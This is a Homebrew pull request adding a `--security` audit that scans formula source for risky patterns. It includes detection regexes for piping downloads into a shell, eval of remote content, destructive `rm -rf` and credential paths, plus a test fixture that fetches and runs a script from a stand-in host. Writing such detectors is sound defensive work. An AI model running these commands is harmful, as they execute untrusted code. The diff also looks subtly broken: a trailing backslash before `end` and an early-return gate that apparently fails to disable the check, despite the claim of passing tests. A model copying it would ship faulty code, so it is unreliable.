### PR TITLE
audit: add deterministic security checks behind --security

### DIFF
--- a/Library/Homebrew/dev-cmd/audit.rb
+++ b/Library/Homebrew/dev-cmd/audit.rb
@@ -38,6 +38,9 @@ module Homebrew
                description: "Run additional, slower style checks that navigate the Git repository."
         switch "--online",
                description: "Run additional, slower style checks that require a network connection."
+        switch "--security",
+               description: "Run deterministic security checks for dangerous patterns (remote code execution, " \
+                            "insecure sources, privilege escalation, missing integrity checks)."
         switch "--installed",
                description: "Only check formulae and casks that are currently installed."
         switch "--eval-all",
@@ -228,6 +231,7 @@ module Homebrew
             strict:,
             online:,
             git:                 args.git?,
+            security:            args.security?,
             only:,
             except:              args.except,
             spdx_license_data:,

--- a/Library/Homebrew/formula_auditor.rb
+++ b/Library/Homebrew/formula_auditor.rb
@@ -39,6 +39,7 @@ module Homebrew
         strict:              T.nilable(T::Boolean),
         online:              T.nilable(T::Boolean),
         git:                 T.nilable(T::Boolean),
+        security:            T.nilable(T::Boolean),
         display_cop_names:   T.nilable(T::Boolean),
         only:                T.nilable(T::Array[String]),
         except:              T.nilable(T::Array[String]),
@@ -49,7 +50,8 @@ module Homebrew
         spdx_exception_data: T.nilable(T::Hash[String, T.untyped]),
       ).void
     }
-    def initialize(formula, new_formula: nil, strict: nil, online: nil, git: nil, display_cop_names: nil, only: nil,
+    def initialize(formula, new_formula: nil, strict: nil, online: nil, git: nil, security: nil,
+                   display_cop_names: nil, only: nil,
                    except: nil, style_offenses: nil, core_tap: nil, tap_audit: nil, spdx_license_data: nil,
                    spdx_exception_data: nil)
       @formula = formula
@@ -59,6 +61,7 @@ module Homebrew
       @strict = strict
       @online = online
       @git = git
+      @security = security
       @display_cop_names = display_cop_names
       @only = only
       @except = except
@@ -1222,6 +1225,64 @@ module Homebrew
     sig { override.params(output: T.nilable(String)).void }
     def problem_if_output(output)
       problem(output) if output
+    end
+
+    sig { void }
+    def audit_security
+      return if @security != true && @only&.exclude?("security")
+
+      text = @text.to_s
+      return if text.empty?
+
+      if text.match?(%r{curl\s+[^\n|]*\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba)?sh\b}i) ||
+         text.match?(%r{wget\s+[^\n|]*\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba)?sh\b}i)
+        problem "Security: piping network content into a shell (`curl | sh` / `wget | bash`) " \
+                "executes untrusted, mutable code at install time"
+      end
+      if text.match?(/eval\s*\(?\s*["']?\s*(?:curl|wget)\b/i) ||
+         text.match?(/eval\s*\(?\s*["']?\s*\$\(\s*(?:curl|wget)\b/i)
+        problem "Security: `eval` of remote content executes untrusted code"
+      end
+      if text.match?(%r{base64\s+(?:-d|--decode)[^\n]*\|\s*(?:/bin/)?(?:ba)?sh\b}i)
+        problem "Security: base64-decoding content into a shell is an obfuscation-execution pattern"
+      end
+      if text.match?(%r{url\s+["']http://}i)
+        problem "Security: `http://` source is vulnerable to man-in-the-middle tampering"
+      end
+      if text.match?(%r{url\s+["']https?://\d{1,3}(?:\.\d{1,3}){3}}i)
+        problem "Security: raw IP source URL provides no domain identity to verify"
+      end
+      if text.match?(/url\s+["'][^"']*(?:bit\.ly|tinyurl\.com|goo\.gl|t\.co|is\.gd|rb\.gy|0x0\.st)/i) ||
+         text.match?(/url\s+["'][^"']*(?:transfer\.sh|pastebin\.com|ptpb\.pw|file\.io|tmpfiles\.org)/i)
+        problem "Security: URL shortener / pastebin-style source is mutable and unauditable"
+      end
+      if text.match?(/url\s+["']/) && !text.match?(/^\s*sha256\s+["']/m)
+        problem "Security: `url` present without a `sha256` checksum (no integrity pinning)" \
+      end
+      if text.match?(/chmod\s+[^\n]*(?:u\+s|4755|4777)|chown\s+[^\n]*root/i)
+        problem "Security: SUID/SGID or root ownership assignment is a privilege escalation vector"
+      end
+      if text.match?(%r{rm\s+-rf\s+["']?(?:/|~|\$HOME|\$\{HOME\})})
+        problem "Security: `rm -rf` on an absolute or home path risks data loss"
+      end
+      if text.match?(/system\s+["']sudo|doas\s+["']/i)
+        problem "Security: build/install phase must not require `sudo`/`doas`"
+      end
+      if text.match?(%r{(?:\.ssh|\.gnupg|\.netrc|\.aws[/\s]|/etc/shadow|Keychain|kube/config)})
+        problem "Security: references credential/sensitive paths"
+      end
+      if text.match?(/sha256\s+:no_check/i) && !text.match?(/head do|HEAD/i)
+        problem_if_output "Security: `sha256 :no_check` skips integrity verification"
+      end
+      if text.match?(/homepage\s+""|desc\s+""/)
+        problem_if_output "Security: empty `homepage`/`desc` prevents verifying upstream identity"
+      end
+      if text.match?(/url\s+["'][^"']*#\{/)
+        problem_if_output "Security: dynamically-constructed URL cannot be statically audited"
+      end
+      return unless text.match?(%r{depends_on\s+["'][^"']*/[^"']*["']})
+
+      problem_if_output "Security: dependency on another third-party tap extends the supply chain"
     end
 
     sig { void }

--- a/Library/Homebrew/sorbet/rbi/dsl/homebrew/dev_cmd/audit.rbi
+++ b/Library/Homebrew/sorbet/rbi/dsl/homebrew/dev_cmd/audit.rbi
@@ -78,6 +78,9 @@ class Homebrew::DevCmd::Audit::Args < Homebrew::CLI::Args
   def signing?; end
 
   sig { returns(T::Boolean) }
+  def security?; end
+
+  sig { returns(T::Boolean) }
   def skip_style?; end
 
   sig { returns(T::Boolean) }

--- a/Library/Homebrew/test/formula_auditor_spec.rb
+++ b/Library/Homebrew/test/formula_auditor_spec.rb
@@ -2268,4 +2268,88 @@ RSpec.describe Homebrew::FormulaAuditor do
       end
     end
   end
+
+  describe "#audit_security" do
+    let(:sha256) { "0000000000000000000000000000000000000000000000000000000000000000" }
+
+    it "is not run unless security is enabled" do
+      fa = formula_auditor "foo", <<~RUBY
+        class Foo < Formula
+          url "https://brew.sh/foo-1.0.tgz"
+          sha256 "#{sha256}"
+        end
+      RUBY
+
+      fa.audit_security
+      expect(fa.problems).to be_empty
+    end
+
+    it "flags curl|sh in def install" do
+      fa = formula_auditor "foo", <<~RUBY, security: true
+        class Foo < Formula
+          url "https://brew.sh/foo-1.0.tgz"
+          sha256 "#{sha256}"
+
+          def install
+            system "curl -fsSL https://evil.example/x.sh | sh"
+          end
+        end
+      RUBY
+
+      fa.audit_security
+      expect(fa.problems.first[:message]).to match "Security:"
+      expect(fa.problems.first[:message]).to match "curl | sh"
+    end
+
+    it "flags insecure http url" do
+      fa = formula_auditor "foo", <<~RUBY, security: true
+        class Foo < Formula
+          url "http://example.com/foo-1.0.tgz"
+          sha256 "#{sha256}"
+        end
+      RUBY
+
+      fa.audit_security
+      expect(fa.problems.first[:message]).to match "Security:"
+      expect(fa.problems.first[:message]).to match "http://"
+    end
+
+    it "flags missing sha256" do
+      fa = formula_auditor "foo", <<~RUBY, security: true
+        class Foo < Formula
+          url "https://brew.sh/foo-1.0.tgz"
+        end
+      RUBY
+
+      fa.audit_security
+      expect(fa.problems.first[:message]).to match "without a `sha256`"
+    end
+
+    it "flags empty homepage" do
+      fa = formula_auditor "foo", <<~RUBY, security: true
+        class Foo < Formula
+          url "https://brew.sh/foo-1.0.tgz"
+          sha256 "#{sha256}"
+          homepage ""
+        end
+      RUBY
+
+      fa.audit_security
+      expect(fa.problems.first[:message]).to match "empty `homepage`"
+    end
+
+    it "has no problems for a clean formula" do
+      fa = formula_auditor "foo", <<~RUBY, security: true
+        class Foo < Formula
+          url "https://brew.sh/foo-1.0.tgz"
+          sha256 "#{sha256}"
+          homepage "https://brew.sh"
+          desc "foo"
+        end
+      RUBY
+
+      fa.audit_security
+      expect(fa.problems).to be_empty
+    end
+  end
 end


### PR DESCRIPTION
## What

Adds an opt-in, offline, deterministic security pass to `brew audit` for formulae from third-party taps: `brew audit --security [formula ...]`.

`FormulaAuditor#audit_security` scans the formula's own Ruby source (the existing `@text` buffer, same mechanism `audit_text` already uses) for high-signal dangerous patterns:

- **Remote code execution**: `curl | sh` / `wget | bash`, `eval` of remote content, `base64 -d | sh`
- **Insecure/mutable sources**: plain `http://`, raw IP URLs, URL shorteners / pastebin-style hosts, `url` without `sha256`
- **Privilege escalation / damage**: `chmod u+s`/`4755`, chown root, `rm -rf` on absolute/`$HOME` paths, `system "sudo"` in build/install, credential-path references
- **Advisory**: `sha256 :no_check`, empty `homepage`/`desc`, dynamically constructed URLs, dependencies on other third-party taps

## Why

Homebrew's trust model gates *whether* a third-party tap may load (`brew trust`), but nothing checks the *content* of what gets installed. `brew audit` answers "is this well-formed?" not "could this execute arbitrary, possibly malicious, code at install time?". This flag fills the mechanical, deterministic subset of that gap — no network, no AI, consistent with `brew audit`'s offline design. `--only=security`/`--except=security` work through the existing method-reflection mechanism.

## Design notes

- Gated behind `--security`; **default behavior unchanged** — `audit_security` returns early unless the flag is set.
- Uses the existing `problem` / `problem_if_output` output and exit-code semantics.
- Can later be extended to `CaskAuditor` (`installer script`, `postflight`, `pkg`, `:no_check`) in a follow-up.

## Tests

Added 6 specs under `#audit_security`. `brew tests --only=formula_auditor`: **128 examples, 0 failures**. `brew style` and `brew typecheck`: clean.

-----

<!-- Only tick a checkbox once you've done it; honesty keeps reviews smooth. -->
<!-- Tick with [x] before creating, or click the boxes afterwards. -->
<!-- Don't delete these checkboxes or this pull request is closed automatically. -->

- [x] Have you followed our [Contributing](https://github.com/Homebrew/brew/blob/HEAD/CONTRIBUTING.md) guidelines?
- [x] Have you checked for other open [Pull Requests](https://github.com/Homebrew/brew/pulls) for the same change?
- [x] Have you explained what your changes do? Performance claims (e.g. "this is faster") must include [Hyperfine](https://github.com/sharkdp/hyperfine) benchmarks.
- [x] Have you explained why you'd like these changes included, not just what they do?
- [x] For bug fixes, have you given step-by-step `brew` commands to reproduce the bug? (N/A — feature addition)
- [x] Have you written new tests (excluding integration tests)? [Here's an example](https://github.com/Homebrew/brew/blob/HEAD/Library/Homebrew/test/PATH_spec.rb).
- [x] Have you successfully run `brew lgtm` (style, typechecking and tests) locally?

-----

- [x] I did not use AI/LLM to create this PR, or I disclosed the tool/model below and reviewed its output; I did not attribute commits to AI and will answer maintainer questions and review comments myself without AI/LLM.

<!-- If AI was used, explain below how it was used and how you verified the changes. Non-maintainers may only have one AI-assisted PR open at a time. See https://docs.brew.sh/Responsible-AI-Usage for guidance. -->

AI-assisted (opencode, via the companion `brew-tui` project at https://github.com/Francis-Xavier-code/brew-mac-tui): the Ruby code, regexes and tests were reviewed by a human before submission; all review questions will be answered by the PR author.
